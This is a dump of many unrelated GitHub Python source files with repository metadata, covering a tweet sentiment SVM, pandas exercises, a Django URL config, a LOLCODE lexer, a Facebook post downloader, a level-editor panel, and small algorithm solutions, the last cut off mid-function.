if USE_BIGRAMS:
for bigram in tweet_bigrams:
idx = bigrams.get(bigram)
if idx:
features[j, UNIGRAM_SIZE + idx] += 1
yield features, labels
def apply_tf_idf(X):
transformer = TfidfTransformer(smooth_idf=True, sublinear_tf=True, use_idf=True)
transformer.fit(X)
return transformer
def process_tweets(csv_file, test_file=True):
"""Returns a list of tuples of type (tweet_id, feature_vector)
or (tweet_id, sentiment, feature_vector)
Args:
csv_file (str): Name of processed csv file generated by preprocess.py
test_file (bool, optional): If processing test file
Returns:
list: Of tuples
"""
tweets = []
print ('Generating feature vectors')
with open(csv_file, 'r') as csv:
lines = csv.readlines()
total = len(lines)
for i, line in enumerate(lines):
if test_file:
tweet_id, tweet = line.split(',')
else:
tweet_id, sentiment, tweet = line.split(',')
feature_vector = get_feature_vector(tweet)
if test_file:
tweets.append((tweet_id, feature_vector))
else:
tweets.append((tweet_id, int(sentiment), feature_vector))
write_status(i + 1, total)
print ('\n')
return tweets
if __name__ == '__main__':
np.random.seed(1337)
unigrams = top_n_words(FREQ_DIST_FILE, UNIGRAM_SIZE)
if USE_BIGRAMS:
bigrams = top_n_bigrams(BI_FREQ_DIST_FILE, BIGRAM_SIZE)
tweets = process_tweets(TRAIN_PROCESSED_FILE, test_file=False)
if TRAIN:
train_tweets, val_tweets = split_data(tweets)
else:
random.shuffle(tweets)
train_tweets = tweets
del tweets
print ('Extracting features & training batches')
clf = svm.LinearSVC(C=0.1)
batch_size = len(train_tweets)
i = 1
n_train_batches = int(np.ceil(len(train_tweets) / float(batch_size)))
for training_set_X, training_set_y in extract_features(train_tweets, test_file=False, feat_type=FEAT_TYPE, batch_size=batch_size):
write_status(i, n_train_batches)
i += 1
if FEAT_TYPE == 'frequency':
tfidf = apply_tf_idf(training_set_X)
training_set_X = tfidf.transform(training_set_X)
clf.fit(training_set_X, training_set_y)
print ('\n')
print ('Testing')
if TRAIN:
correct, total = 0, len(val_tweets)
i = 1
batch_size = len(val_tweets)
n_val_batches = int(np.ceil(len(val_tweets) / float(batch_size)))
for val_set_X, val_set_y in extract_features(val_tweets, test_file=False, feat_type=FEAT_TYPE, batch_size=batch_size):
if FEAT_TYPE == 'frequency':
val_set_X = tfidf.transform(val_set_X)
prediction = clf.predict(val_set_X)
correct += np.sum(prediction == val_set_y)
write_status(i, n_val_batches)
i += 1
print ('\nCorrect: %d/%d = %.4f %%' % (correct, total, correct * 100. / total))
else:
del train_tweets
test_tweets = process_tweets(TEST_PROCESSED_FILE, test_file=True)
n_test_batches = int(np.ceil(len(test_tweets) / float(batch_size)))
predictions = np.array([])
print ('Predicting batches')
i = 1
for test_set_X, _ in extract_features(test_tweets, test_file=True, feat_type=FEAT_TYPE):
if FEAT_TYPE == 'frequency':
test_set_X = tfidf.transform(test_set_X)
prediction = clf.predict(test_set_X)
predictions = np.concatenate((predictions, prediction))
write_status(i, n_test_batches)
i += 1
predictions = [(str(j), int(predictions[j]))
for j in range(len(test_tweets))]
save_results_to_csv(predictions, 'svm.csv')
print ('\nSaved to svm.csv')
|
[
"noreply@github.com"
] |
harpreetheer.noreply@github.com
|
80f09c5b9d22476348d3c1492fe361283951adc8
|
b66035d6216f5e33fdeca2edb74daabe6d8a9ca0
|
/One-Hot Encoding.py
|
ff53c359543e01a0963246d0ba33f0d310a09379
|
[] |
no_license
|
mengqqq/pandas-playground
|
96a5dec71321b0f21aca6327864c8da6efa86e07
|
81bff69d5eaa83c5efdb2388d9f0c83aa9a43226
|
refs/heads/master
| 2021-01-12T06:25:22.387308
| 2019-02-01T05:46:52
| 2019-02-01T05:46:52
| 77,357,472
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,351
|
py
|
#In this exercise we'll load the titanic data(from Project 0)
#And then perform one-hot encoding on the feature names
import numpy as np
import pandas as pd
#load the dataset
X=pd.read_csv('titanic_data.csv')
#Limit to categorical data
X=X.select_dtypes(include=[object])
from sklearn.preprocessing import LabelEncoder
from sklearn.preprocessing import OneHotEncoder
#TODO:Create a LabelEncoder object,which will turn all labels present in each featuren to numbers.For example,the labels
#['cat','dog','fish'] might be transformed into[0,1,2]
le=LabelEncoder()
#TODO:For each feature in X,apply the LabelEncoder's fit_transform function,which will first learn the labels for the feature(fit)
#and then change the labels to numbers(transform)
for feature in X:
X[feature]=le.fit_transform(X[feature])
#TODO:Create a OneHotEncoder object,which will create a feature for each label present in the data.For example,for a feature
'animal' that had the labels ['cat','dog','fish'],the new features (instead of 'animal') could be['animal_cat','animal_dog',
'animal_fish']
ohe=OneHotEncoder()
#TODO:Apply the OneHotEncoder's fit_transform function to all of X,which will first learn of all the (now numerical) labels in the
#data(fit),and then change the data to one-hot encoded entries(transfomr)
onehotlabels=ohe.fit_transfomr(X)
|
[
"noreply@github.com"
] |
mengqqq.noreply@github.com
|
bdac5edf7f3db0fe435d7b0ab6901a9fc6b4d318
|
23d4c1deda861ab6b4c1993df7777c34701ad53b
|
/OperacionesEsenciales.py
|
6ed9ce908a6ecbdeedd55d72d8d335ab36b22d6e
|
[] |
no_license
|
JaviMiot/EstructuraDatosLinealesPy
|
2256fc3cb3a1a66e4f227d43665843b591bbb06e
|
7186ef7fa9dbe05aefc1366e3e389733565f38fc
|
refs/heads/master
| 2023-07-21T00:48:44.571028
| 2021-08-16T13:44:35
| 2021-08-16T13:44:35
| 396,812,046
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 405
|
py
|
fruits = []
fruits.append('kiwi')
fruits.append('Melon')
fruits.append('Berry')
fruits.sort()
def pyramid_sum(lower, upper, margin=0):
blanks = ' '*margin
print(blanks, lower, upper)
if lower > upper:
print(blanks, 0)
return 0
else:
result = lower + pyramid_sum(lower+1, upper, margin+4)
print(blanks, result)
return result
pyramid_sum(1, 4)
|
[
"51manobandajavier@gmail.com"
] |
51manobandajavier@gmail.com
|
f74fc4a2ebfb0443c20ad7abd7a4ab66bf9333b6
|
f344893ad54833825e96f5b944658ff7549fa22b
|
/demo/urls.py
|
5d0e462c636b3da392f7ed28375faec4ec52560e
|
[] |
no_license
|
snow/stargazer
|
f9a95f633d94b63e52baca4e2364dfbfce8a6067
|
574228cc79377c3ecf31eb1e15b5366a72484538
|
refs/heads/master
| 2021-01-19T06:35:36.772041
| 2011-12-24T08:31:54
| 2011-12-24T08:31:54
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 976
|
py
|
from django.conf.urls.defaults import patterns, include, url
from django.contrib.auth.decorators import login_required
from demo.views import *
# Uncomment the next two lines to enable the admin:
# from django.contrib import admin
# admin.autodiscover()
urlpatterns = patterns('',
url(r'^$', IndexView.as_view()),
url(r'^post/create/$', login_required(CreatePostView.as_view())),
url(r'^post/(?P<type>recent|top|trending)/$',
PostListContainerView.as_view()),
url(r'^post/load/recent/', RecentPostListView.as_view()),
url(r'^post/load/by_user/(?P<id>\d+)/', UserPostListView.as_view()),
url(r'^post/like/$', login_required(LikePostView.as_view())),
url(r'^post/ban/$', login_required(BanPostView.as_view())),
url(r'^user/(?P<pk>\d+)/$', UserProfileView.as_view()),
url(r'^me/$', login_required(MeView.as_view())),
url(r'^teleport/$', TeleportView.as_view()),
url(r'^accounts/signup/$', SignupView.as_view()),
)
|
[
"snow.hellsing@gmail.com"
] |
snow.hellsing@gmail.com
|
fac2d298e02bcc8ef50d8d0b6951a4819ac85271
|
bf99b1b14e9ca1ad40645a7423f23ef32f4a62e6
|
/AtCoder/other/第5回_ドワンゴからの挑戦状/c.py
|
fb79bc6efefb9431f198b277bfb46c18636d9ead
|
[] |
no_license
|
y-oksaku/Competitive-Programming
|
3f9c1953956d1d1dfbf46d5a87b56550ff3ab3db
|
a3ff52f538329bed034d3008e051f30442aaadae
|
refs/heads/master
| 2021-06-11T16:14:12.635947
| 2021-05-04T08:18:35
| 2021-05-04T08:18:35
| 188,639,647
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 640
|
py
|
N = int(input())
S = input()
_ = input()
K = list(map(int, input().split()))
def sol(k):
ret = 0
right = 0
c = 0
m = 0
mc = 0
nx = 0
for left, s in enumerate(S):
while right < N and right - left < k:
if S[right] == 'M':
nx += 1
elif S[right] == 'C':
m += nx
mc += m
nx = 0
c += 1
right += 1
if s == 'D':
ret += mc
elif s == 'M':
mc -= c
m -= 1
elif s == 'C':
c -= 1
return ret
for k in K:
print(sol(k))
|
[
"y.oksaku@stu.kanazawa-u.ac.jp"
] |
y.oksaku@stu.kanazawa-u.ac.jp
|
2040c5809e80b3fab02ac186ac01165dc0f87e90
|
01d6b909e91b6472ec03833196723988602845ad
|
/Project7/lolcode_lexer.py
|
a974cecf0864628046bed0ee39d14e73644c3d4a
|
[] |
no_license
|
Slapppy109/CSE450
|
c93c881c990d993485f2a3675f21170402d89bd0
|
d3b13d37aada8bdcd748d3a0998df2821638cc4f
|
refs/heads/main
| 2023-02-05T05:14:33.999649
| 2020-12-25T19:17:09
| 2020-12-25T19:17:09
| 324,418,100
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,534
|
py
|
import re
from . rply import LexerGenerator
from . ast_nodes import PrimitiveType
def get_tokens_and_types(input_):
lg = LexerGenerator()
keywords = set()
id_to_type = {}
# Comments
lg.ignore(r'OBTW.*?TLDR', flags=re.DOTALL)
lg.ignore(r'BTW.*')
# Whitespace
lg.add('NEWLINE', r'\r|\n|(\n\r)|,')
lg.ignore(r'[ \t]+')
# Literals
lg.add('NUMBAR_LITERAL', r'-?[0-9]*\.[0-9]+')
lg.add('NUMBR_LITERAL', r'-?[0-9]+')
lg.add('LETTR_LITERAL', r"'([^:']|(:')|(:>)|(::)|(:\)))'")
id_to_type['WIN'] = 'TROOF_LITERAL'
id_to_type['FAIL'] = 'TROOF_LITERAL'
lg.add('YARN_LITERAL', r'"([^:"]|(:")|(:>)|(::)|(:\)))*"')
# Program Keywords
keywords |= {'HAI', 'KTHXBYE'}
# Array Types
for primitive_type in PrimitiveType:
id_to_type[primitive_type.name + 'S'] = 'ARRAY_TYPE'
# Primitive Types
for primitive_type in PrimitiveType:
id_to_type[primitive_type.name] = 'PRIMITIVE_TYPE'
# IO Keywords
keywords |= {'VISIBLE', 'GIMMEH', 'WHATEVR'}
lg.add('BANG', r'!')
# Declaration and Initialization Keywords
keywords |= {'I', 'HAS', 'A', 'ITZ', 'AN'}
# ASSIGNMENT
keywords |= {'R'}
# MATH OPERATORS
id_to_type['SUM'] = 'MATH_BINARY_OPERATOR'
id_to_type['DIFF'] = 'MATH_BINARY_OPERATOR'
id_to_type['PRODUKT'] = 'MATH_BINARY_OPERATOR'
id_to_type['QUOSHUNT'] = 'MATH_BINARY_OPERATOR'
id_to_type['BIGGR'] = 'MATH_BINARY_OPERATOR'
id_to_type['SMALLR'] = 'MATH_BINARY_OPERATOR'
id_to_type['FLIP'] = 'MATH_UNARY_OPERATOR'
id_to_type['SQUAR'] = 'MATH_UNARY_OPERATOR'
keywords |= {'OF'}
# LOGICAL OPERATORS
id_to_type['BOTH'] = 'LOGICAL_BINARY_OPERATOR'
id_to_type['EITHER'] = 'LOGICAL_BINARY_OPERATOR'
id_to_type['WON'] = 'LOGICAL_BINARY_OPERATOR'
id_to_type['NOT'] = 'LOGICAL_UNARY_OPERATOR'
id_to_type['ALL'] = 'LOGICAL_VARIABLE_OPERATOR'
id_to_type['ANY'] = 'LOGICAL_VARIABLE_OPERATOR'
keywords |= {'MKAY'}
# COMPARISON OPERATORS
id_to_type['SAEM'] = 'COMPARISON_BINARY_OPERATOR'
id_to_type['DIFFRINT'] = 'COMPARISON_BINARY_OPERATOR'
id_to_type['FURSTSMALLR'] = 'COMPARISON_BINARY_OPERATOR'
id_to_type['FURSTBIGGR'] = 'COMPARISON_BINARY_OPERATOR'
# ASSIGNMENT OPERATORS
id_to_type['UPPIN'] = 'ASSIGNMENT_OPERATOR'
id_to_type['NERFIN'] = 'ASSIGNMENT_OPERATOR'
keywords |= {'BY'}
# CONDITIONAL STATEMENT
keywords |= {'O', 'RLY', 'YA', 'NO', 'WAI', 'OIC'}
lg.add('QUESTION_MARK', r'\?')
# LOOPS
keywords |= {'IM', 'IN', 'YR', 'LOOP', 'OUTTA', 'NOW', 'GTFO'}
# LOOPS For Project 5
keywords |= {'TIL'}
# ARRAYS
keywords |= {'YARN', 'LOTZ', 'THAR', 'IZ', 'PUT', 'IN', 'LENGTHZ'}
lg.add('INDEX_OPERATOR', r"'Z")
# FUNCTIONS
keywords |= {'HOW', 'IF', 'U', 'SAY', 'SO', 'FOUND'}
# Other words are variable names
lg.add('IDENTIFIER', r'[a-zA-Z][a-zA-Z_0-9]*')
lg.add('ERROR', r'.')
# CASE
keywords |= {'WTF', 'OMG', 'OMGWTF', 'OIC'}
lexer = lg.build()
tokens = list(lexer.lex(input_))
for token in tokens:
lexeme = token.value
if lexeme in keywords:
token.name = token.value
elif lexeme in id_to_type:
token.name = id_to_type[lexeme]
rules_to_ignore = {'ERROR'}
token_types = [rule.name for rule in lexer.rules if rule.name not in rules_to_ignore]
token_types.extend(keywords)
token_types.extend(set(id_to_type.values()))
return tokens, token_types
|
[
"noreply@github.com"
] |
Slapppy109.noreply@github.com
|
6a37cbe91e17feb62b020198a8684987f1b61f1b
|
0062ceae0071aaa3e4e8ecd9025e8cc9443bcb3b
|
/solved/2460.py
|
e43dcbf5be4ab48cd6e0851f802d45d406b792b7
|
[] |
no_license
|
developyoun/AlgorithmSolve
|
8c7479082528f67be9de33f0a337ac6cc3bfc093
|
5926924c7c44ffab2eb8fd43290dc6aa029f818d
|
refs/heads/master
| 2023-03-28T12:02:37.260233
| 2021-03-24T05:05:48
| 2021-03-24T05:05:48
| 323,359,039
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 122
|
py
|
res, ans = 0, 0
for _ in range(10):
a, b = map(int, input().split())
res += b-a
ans = max(res, ans)
print(ans)
|
[
"pyoun820@naver.com"
] |
pyoun820@naver.com
|
851484b4d81515383127776083647ed6be8ec8ff
|
9aa3bd9ee15623a3922159d00bc4918c0a586c1a
|
/week5/game/run.py
|
422a91aea0e5e6876d51838ee88999b25635958e
|
[] |
no_license
|
q1144/spp-code-samples
|
b950443e53c36588ab65acc24eb36eb2ffa8fbf1
|
8d16ebf41e277f9f189c32c877a9c4186dcfa341
|
refs/heads/master
| 2021-08-19T10:46:28.717692
| 2017-11-26T00:00:40
| 2017-11-26T00:00:40
| 109,323,606
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 582
|
py
|
from g_classes import *
from util_classes import SupTools
# --- define ntry point function
def run_game():
print('-------------------------------Welcome to the game!---------------------------\n')
# set amount of troops
total_army_qnt = SupTools.set_army_qnt()
user_army = Army(Recruiter().recruite_for_user(total_army_qnt), 'User')
opp_army = Army(Recruiter().recruite_for_NPC(total_army_qnt), 'NPC')
Fight = Battle(user_army, opp_army)
Fight.begin()
# -------------------- Run main function ------------------
run_game()
|
[
"kachur.oleg@gmail.com"
] |
kachur.oleg@gmail.com
|
e2d0468b0ddd2654f659ef22a7b2ab17c7fafc3b
|
7f6348437a68aef1035824e3c2ac7476e81cf5f0
|
/Hashing/colorful-number.py
|
77a200c426fb273da6bdf6346026e6235a772ca8
|
[] |
no_license
|
wilfredarin/Interviewbit
|
eff18ce504a2178dbed0441f9b43df51f0a34dd1
|
a13de501db6e0af9d58936ffa9abdd9eebc7578d
|
refs/heads/master
| 2023-01-27T15:36:11.726563
| 2020-12-10T15:09:14
| 2020-12-10T15:09:14
| 233,567,842
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 598
|
py
|
class Solution:
# @param A : integer
# @return an integer
def colorful(self, A):
s = str(A)
n = len(s)
s = list(s)
p = {}
i = 1
while i<=n:
j=0
while j+i<=n:
o = s[j:j+i]
u =1
for q in o:
u*=int(q)
if u in p.keys():
return 0
else:
p[u]=1
j+=1
i+=1
return 1
|
[
"noreply@github.com"
] |
wilfredarin.noreply@github.com
|
52d3b39e32c041bd114d23cd7daf9be2ebc5e514
|
87ad88c4150b1770e2de793557db394c5ae087cb
|
/for_num_game.py
|
ed6d6c80ab84cd34080f04b1a2db396e0eca9a90
|
[] |
no_license
|
pratiksan45/Python3.7
|
bfedad3723cee82bdd3512f1c11456a6a5f1a925
|
aa8943e81e68a3cf699423286856c37cf194f120
|
refs/heads/master
| 2022-09-09T14:15:12.723017
| 2020-05-25T15:37:55
| 2020-05-25T15:37:55
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 652
|
py
|
import random
win_num=random.randint(1,100)
for i in range(1,100):
guess=int(input("Specify your number \n "))
print("Analyzing your number..... ")
if guess<win_num:
print("Too Low ! ")
elif guess>win_num:
print("Too High ! ")
else:
print("CONGRATULATIONS ! Youre Number is correct")
print(f"You guessed the winning number in {i} intervals")
break
#names=input("Enter the Specified name\n")
#name=names.lower()
#var=""
#i=0
#while i<len(name):
#if name[i] not in var:
#var+=name[i]
#print(str(name[i]) +":"+ str(name.count(name[i]) ))
#i+=1
|
[
"noreply@github.com"
] |
pratiksan45.noreply@github.com
|
5ab5a8fe6272a579cf1e84de9beb0052b0a43dc7
|
799cfbd2c6426ffa7ab5f188bd647d572051914c
|
/rotateArray.py
|
34740139c6098cff232ae9e81e54d877becf66dd
|
[] |
no_license
|
van950105/leetcode
|
af8d2ded307afbfbf67df604a69406f9ab5ef1b0
|
7b6cbab37e13ff1d764b852bc1794ecbfd4feefe
|
refs/heads/master
| 2016-09-03T06:22:43.451203
| 2015-11-12T18:49:38
| 2015-11-12T18:49:38
| 25,235,439
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 500
|
py
|
class Solution(object):
def rotate(self, nums, k):
"""
:type nums: List[int]
:type k: int
:rtype: void Do not return anything, modify nums in-place instead.
"""
length=len(nums)
self.reverse(nums,0,length-k)
self.reverse(nums,length-k,length)
self.reverse(nums,0,length)
def reverse(self,num,s,e):
num[s:e]=num[s:e][::-1]
#Rotate first part,second part and the whole list
a=Solution()
print a.rotate([1],1)
|
[
"ryan.gm.nb@gmail.com"
] |
ryan.gm.nb@gmail.com
|
6300bdfd2672ce3ad803ad57825f41def48e8f2c
|
6c26a9bd075d3d54a307d7c1e5a0bc67b50df8c2
|
/python_intermediate/python5/02_intro.py
|
2d9b7d1a158e4176847e1b7ea1b41917c95d97fa
|
[] |
no_license
|
marialobillo/dataquest
|
86efc49c0339c07e6263d428b5ecd2f80d395ecb
|
49e8b653adf23a12fb9eb6a972d85bc1797dba0a
|
refs/heads/master
| 2021-08-28T08:01:36.301087
| 2017-12-11T16:02:18
| 2017-12-11T16:02:18
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 284
|
py
|
import csv
f = open('nfl_suspensions_data.csv', 'r')
nfl_suspensions = []
nfl_suspensions = list(csv.reader(f))[1:]
years = {}
for row in nfl_suspensions:
row_year = row[5]
if row_year in years:
years[row_year] += 1
else:
years[row_year] = 1
print(years)
|
[
"maria.lobillo.santos@gmail.com"
] |
maria.lobillo.santos@gmail.com
|
5d9af04328cd22f5d1be08484844dc384096efb8
|
46a1cfb9b737ea686d14ef3f903ffc66ad014a74
|
/Menu.py
|
e87f515e4202b8f3fa5a8c8ed7741b9ae10ec1c1
|
[] |
no_license
|
kronmess/FinalProjectSem1
|
f66b88821acb1941e5d0462a078b6975c99c0463
|
74afee13d373a4d2058d5cf0e4482274831630ef
|
refs/heads/master
| 2020-12-09T18:33:22.426614
| 2020-01-17T13:57:35
| 2020-01-17T13:57:35
| 233,384,878
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,607
|
py
|
import pygame
from Target import red
from Target import white
from Target import win
#function used to draw in text
def draw_text(message,color,x,y,font_size):
Font = pygame.font.Font('press_start.ttf',font_size)
text = Font.render(message, True, color)
win.blit(text,[x,y])
#function used to draw rectangle
def make_rect(surface,color,rectangle,thickness= 0):
pygame.draw.rect(surface,color,rectangle,thickness)
#class used to define item property
class Menu:
def __init__(self,stock,price,name,description,base,buybase,title_x,title_y,description_x,description_y,stock_x,stock_y,price_x,price_y):
self.stock = stock
self.price = price
self.name = name
self.description = description
self.base = base
self.buybase = buybase
self.title_x = title_x
self.title_y = title_y
self.description_x = description_x
self.description_y = description_y
self.stock_x = stock_x
self.stock_y = stock_y
self.price_x = price_x
self.price_y = price_y
#draws in item values
def draw(self):
make_rect(win,white,self.base,9)
make_rect(win,red,self.base)
make_rect(win,red,self.buybase)
make_rect(win,white,self.buybase,7)
draw_text(f'{self.name}', white,self.title_x,self.title_y,18)
draw_text(f'{self.description}', white,self.description_x,self.description_y,14)
draw_text(str(self.stock) + ' ' + 'Owned', white,self.stock_x,self.stock_y,12)
draw_text('BUY: ' + '$' +str(self.price),white,self.price_x,self.price_y,12)
|
[
"vincentiusgabriel@yahoo.com"
] |
vincentiusgabriel@yahoo.com
|
f97a05fdd85f6b87c08c40f8b49371468b042c20
|
4323ef02073a8e3c9e6aceba738aef5fc72c3aa6
|
/RedesSociais/facebook_get_my_posts.py
|
5f2d06a1b1ec0aec89c7dfee3fd80bbb7cd69f32
|
[
"MIT"
] |
permissive
|
fotavio16/PycharmProjects
|
e1e57816b5a0dbda7d7921ac024a71c712adac78
|
f5be49db941de69159ec543e8a6dde61f9f94d86
|
refs/heads/master
| 2022-10-19T15:45:52.773005
| 2020-06-14T02:23:02
| 2020-06-14T02:23:02
| 258,865,834
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 752
|
py
|
import json
import facebook
import requests
if __name__ == '__main__':
token = "EAACEdEose0cBALLqHaIO4x1lD679BDZBGt1z2xtgp6UGHaW9WfJJ7osn6G8PQWHz1pJKxUqZBXZAsQSC8O1fCaGHs0yY8IIbvP7m6H7MMN8PZCZCdZCheOU9MJhBvREi42LCo2YRHcfoQQlZCNkBDc8Rc2dHRBRqw4F0MxjbmbYNh9qn2SsC44bg0x8wbTCnGgZD"
graph = facebook.GraphAPI(token)
posts = graph.get_connections('me', 'posts')
while True: # keep paginating
try:
with open('my_posts.jsonl', 'a') as f:
for post in posts['data']:
f.write(json.dumps(post)+"\n")
# get next page
posts = requests.get(posts['paging']['next']).json()
except KeyError:
# no more pages, break the loop
break
|
[
"fotaviofonseca@gmail.com"
] |
fotaviofonseca@gmail.com
|
ff6ca8ca0c7b050f0d9b9dea92e61196b514d894
|
f9c318fcc249c9915df345ecc7bf4c14ff1dda36
|
/toontown/leveleditor/VisGroupsEditor.py
|
d0e4b319f10132cf428974e6b002d05bed7b3949
|
[] |
no_license
|
Benjamin8693/TTOpenLevelEditor
|
b72173bbe1f888d1f30af03714275a71b34cc335
|
037c6aead9de24b5291b998ed7d3e88e7d264687
|
refs/heads/master
| 2023-01-22T09:18:34.520541
| 2020-12-04T19:06:02
| 2020-12-04T19:06:02
| 300,377,917
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,946
|
py
|
import Pmw
import sys
from direct.showbase.TkGlobal import *
from direct.tkwidgets.Tree import *
class VisGroupsEditor(Pmw.MegaToplevel):
def __init__(self, levelEditor, visGroups = ['None'],
parent = None, **kw):
INITOPT = Pmw.INITOPT
optiondefs = (
('title', 'Visability Groups Editor', None),
)
self.defineoptions(kw, optiondefs)
Pmw.MegaToplevel.__init__(self, parent, title = self['title'])
if sys.platform == 'win32':
# FIXME: This doesn't work in other platforms for some reason...
self.iconbitmap("resources/openttle_ico_temp.ico")
self.levelEditor = levelEditor
self.visGroups = visGroups
self.visGroupNames = [pair[1].getName() for pair in self.visGroups]
# Initialize dictionary of visibility relationships
self.visDict = {}
# Group we are currently setting visGroups for
self.target = None
# Flag to enable/disable toggleVisGroup command
self.fCommand = 1
# Handle to the toplevels hull
hull = self.component('hull')
balloon = self.balloon = Pmw.Balloon(hull)
# Start with balloon help disabled
self.balloon.configure(state = 'none')
menuFrame = Frame(hull, relief = GROOVE, bd = 2)
menuFrame.pack(fill = X, expand = 1)
menuBar = Pmw.MenuBar(menuFrame, hotkeys = 1, balloon = balloon)
menuBar.pack(side = LEFT, expand = 1, fill = X)
menuBar.addmenu('Vis Groups Editor',
'Visability Groups Editor Operations')
menuBar.addmenuitem('Vis Groups Editor', 'command',
'Exit Visability Groups Editor',
label = 'Exit',
command = self.preDestroy)
menuBar.addmenu('Help', 'Visability Groups Editor Help Operations')
self.toggleBalloonVar = IntVar()
self.toggleBalloonVar.set(0)
menuBar.addmenuitem('Help', 'checkbutton',
'Toggle balloon help',
label = 'Balloon Help',
variable = self.toggleBalloonVar,
command = self.toggleBalloon)
# Create a combo box to choose target vis group
self.targetSelector = Pmw.ComboBox(
hull, labelpos = W, label_text = 'Target Vis Group:',
entry_width = 12, selectioncommand = self.selectVisGroup,
scrolledlist_items = self.visGroupNames)
self.targetSelector.selectitem(self.visGroupNames[0])
self.targetSelector.pack(expand = 1, fill = X)
# Scrolled frame to hold radio selector
sf = Pmw.ScrolledFrame(hull, horizflex = 'elastic',
usehullsize = 1, hull_width = 200,
hull_height = 400)
frame = sf.interior()
sf.pack(padx = 5, pady = 3, fill = BOTH, expand = 1)
# Add vis groups selector
self.selected = Pmw.RadioSelect(frame, selectmode = MULTIPLE,
orient = VERTICAL,
pady = 0,
command = self.toggleVisGroup)
for groupInfo in self.visGroups:
nodePath = groupInfo[0]
group = groupInfo[1]
name = group.getName()
self.selected.add(name, width = 12)
# Assemble list of groups visible from this group
visible = []
for i in range(group.getNumVisibles()):
visible.append(group.getVisibleName(i))
visible.sort()
self.visDict[name] = [nodePath, group, visible]
# Pack the widget
self.selected.pack(expand = 1, fill = X)
# And make sure scrolled frame is happy
sf.reposition()
buttonFrame = Frame(hull)
buttonFrame.pack(fill = X, expand = 1)
self.showMode = IntVar()
self.showMode.set(0)
self.showAllButton = Radiobutton(buttonFrame, text = 'Show All',
value = 0, indicatoron = 1,
variable = self.showMode,
command = self.refreshVisibility)
self.showAllButton.pack(side = LEFT, fill = X, expand = 1)
self.showActiveButton = Radiobutton(buttonFrame, text = 'Show Target',
value = 1, indicatoron = 1,
variable = self.showMode,
command = self.refreshVisibility)
self.showActiveButton.pack(side = LEFT, fill = X, expand = 1)
# Make sure input variables processed
self.initialiseoptions(VisGroupsEditor)
# Switch to current target's list
self.selectVisGroup(self.visGroupNames[0])
def selectVisGroup(self, target):
print('Setting vis options for group:', target)
# Record current target
oldTarget = self.target
# Record new target
self.target = target
# Deselect buttons from old target (first deactivating command)
self.fCommand = 0
if oldTarget:
visList = self.visDict[oldTarget][2]
for group in visList:
self.selected.invoke(self.selected.index(group))
# Now set buttons to reflect state of new target
visList = self.visDict[target][2]
for group in visList:
self.selected.invoke(self.selected.index(group))
# Reactivate command
self.fCommand = 1
# Update scene
self.refreshVisibility()
def toggleVisGroup(self, groupName, state):
if self.fCommand:
targetInfo = self.visDict[self.target]
target = targetInfo[1]
visList = targetInfo[2]
groupNP = self.visDict[groupName][0]
group = self.visDict[groupName][1]
# MRM: Add change in visibility here
# Show all vs. show active
if state == 1:
print('Vis Group:', self.target, 'adding group:', groupName)
if groupName not in visList:
visList.append(groupName)
target.addVisible(groupName)
# Update vis and color
groupNP.show()
groupNP.setColor(1, 0, 0, 1)
else:
print('Vis Group:', self.target, 'removing group:', groupName)
if groupName in visList:
visList.remove(groupName)
target.removeVisible(groupName)
# Update vis and color
if self.showMode.get() == 1:
groupNP.hide()
groupNP.clearColor()
# Update scene
self.refreshVisibility()
def refreshVisibility(self):
# Get current visibility list for target
targetInfo = self.visDict[self.target]
visList = targetInfo[2]
for key in list(self.visDict.keys()):
groupNP = self.visDict[key][0]
if key in visList:
groupNP.show()
if key == self.target:
groupNP.setColor(0, 1, 0, 1)
else:
groupNP.setColor(1, 0, 0, 1)
else:
if self.showMode.get() == 0:
groupNP.show()
else:
groupNP.hide()
groupNP.clearColor()
def preDestroy(self):
# First clear level editor variable
self.levelEditor.vgpanel = None
self.destroy()
def toggleBalloon(self):
if self.toggleBalloonVar.get():
self.balloon.configure(state = 'balloon')
else:
self.balloon.configure(state = 'none')
|
[
"nathanstgeorge7@gmail.com"
] |
nathanstgeorge7@gmail.com
|
2e90571df71e3cdbc1cdd7a29ca3a6ea2c21a1d4
|
5187c411a1e2eff1233f6cfda11fdf4ef03a631d
|
/Genome_assembly/EulerianCycle.py
|
313f8ab043635a6325ac00e23a5cb50a3c0ee60c
|
[] |
no_license
|
OXPHOS/Bioinfo_Alg
|
dad1cea2a535e92fdc0a2bf0f18e1fe6e0545776
|
042ced4bf000c92253582a1e96952891cda3f5d9
|
refs/heads/master
| 2021-01-10T16:00:38.510749
| 2016-02-09T03:43:36
| 2016-02-09T03:43:36
| 51,345,069
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,731
|
py
|
'''
Solve the Eularian path problem
Input: The adjacency list of an Eulerian directed graph.
Output: An Eulerian cycle in this graph.
Randomly pick a point to start.
If there're still unexplored edges where there's no available way at current node,
we will select a node from the existed path, which still has unexplored edges
then, start from this point, go through the existed path again, and move on to new edges
EULERIANCYCLE(Graph) (modified)
form a cycle Cycle by randomly walking in Graph (don't visit the same edge twice!)
while there are unexplored edges in Graph
select a node newStart in Cycle with still unexplored edges
form Cycle' by traversing Cycle (starting at newStart) and then randomly walking
Cycle <- Cycle'
return Cycle
'''
import random
def input_to_graph(string):
'''
From strings to dict
'''
num_edges = 0
graph = {}
for line in string.splitlines():
line = line.split() # Remove all spaces
if len(line) != 0:
key = int(line[0]) # 1st: key. 2nd: ->.
graph[key] = map(int, line[2].split(','))
num_edges += (len(graph[key]))
return graph, num_edges
def output_path(path):
output = str(path[0])
for _ in range(1, len(path)):
output = output + '->' + str(path[_])
print output
def eulerian_path(string):
'''
